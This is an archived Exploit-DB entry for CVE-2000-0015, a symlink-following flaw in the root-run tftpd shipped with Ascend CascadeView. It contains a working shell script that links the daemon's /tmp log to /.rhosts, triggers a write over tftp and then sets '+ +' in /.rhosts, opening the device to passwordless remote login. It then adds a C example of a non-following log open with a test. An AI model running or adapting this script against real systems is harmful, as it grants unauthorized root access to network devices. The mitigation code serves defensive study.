Exploit Ascend CascadeView/UX 1.0 tftpd - Symbolic Link

Exploiter

Hacker
18 Dec 2022
EDB-ID: 19707
EDB verified: Passed
Author: LONEGUARD
Vulnerability type: LOCAL
Platform: UNIX
CVE: CVE-2000-0015
Publication date: 1999-12-31
Code:
source: https://www.securityfocus.com/bid/910/info

The tftpd bundled with CascadeView for Ascend's B-STDX 8000/9000 network devices creates a log file in /tmp called tftpd_xfer_status.log. If /tmp/tftpd_xfer_status.log already exists as a symbolic link, tftpd will follow it and overwrite any data it points to (it runs as root). An attacker can link the log file to a file such as /.rhosts to gain elevated privileges on the device. Because this is a network device vulnerability, the consequences of a compromise could be much greater for the network the device is on as a whole than if it were a single regular host.

#!/bin/sh
#
# tftpserv.sh - Loneguard 07/03/99
#
# Buggy tftp server shipped with CascadeView B-STDX 8000/9000
#
rm /tmp/tftpd_xfer_status.log
ln -s /.rhosts /tmp/tftpd_xfer_status.log
echo KungFu > crazymonkey
( sleep 1 ; echo put crazymonkey ; sleep 1 ; echo quit ) | tftp 127.1
echo "+ +" > /.rhosts
 
Source
www.exploit-db.com
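
The daemon-side fix for the symlink-following log open described above, as an added example that is not part of the original post or of Ascend's code. The names `open_log_nofollow` and `planted_link_is_refused` are hypothetical, and the demo uses a constructed private temp directory rather than the real /tmp/tftpd_xfer_status.log.

```c
#define _GNU_SOURCE   /* O_NOFOLLOW, O_CLOEXEC, mkdtemp */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper (not from CascadeView): open a log for appending
 * without following a symlink planted at the final path component.
 * Returns a descriptor, or -1 with errno set. */
int open_log_nofollow(const char *path)
{
    /* O_NOFOLLOW makes open() fail (ELOOP on Linux) when path is a symlink;
     * there is no O_TRUNC, so an existing file is never emptied on open. */
    int fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW | O_CLOEXEC, 0600);
    if (fd < 0) return -1;
    struct stat st;
    /* Inspect the descriptor we hold, not the path, to avoid a check/use race.
     * Require a regular file we own with a single link: a hard link to
     * another file would redirect writes just as the symlink does. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != geteuid() || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Constructed scenario: a private temp dir with a symlink where the log
 * should be. Returns 1 if the open was refused and the target not created. */
int planted_link_is_refused(void)
{
    char dir[] = "/tmp/logdemo.XXXXXX", logp[64], victim[64];
    if (!mkdtemp(dir)) return 0;
    snprintf(logp, sizeof logp, "%s/xfer_status.log", dir);
    snprintf(victim, sizeof victim, "%s/victim", dir);
    if (symlink(victim, logp) != 0) return 0;
    int fd = open_log_nofollow(logp);
    int refused = (fd < 0 && access(victim, F_OK) != 0);
    if (fd >= 0) close(fd);
    unlink(logp); unlink(victim); rmdir(dir);
    return refused;
}

int main(void) { return planted_link_is_refused() ? 0 : 1; }
```

A log kept in a root-owned directory instead of a world-writable one removes the race entirely; the checks above are the fallback when the path cannot be moved.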
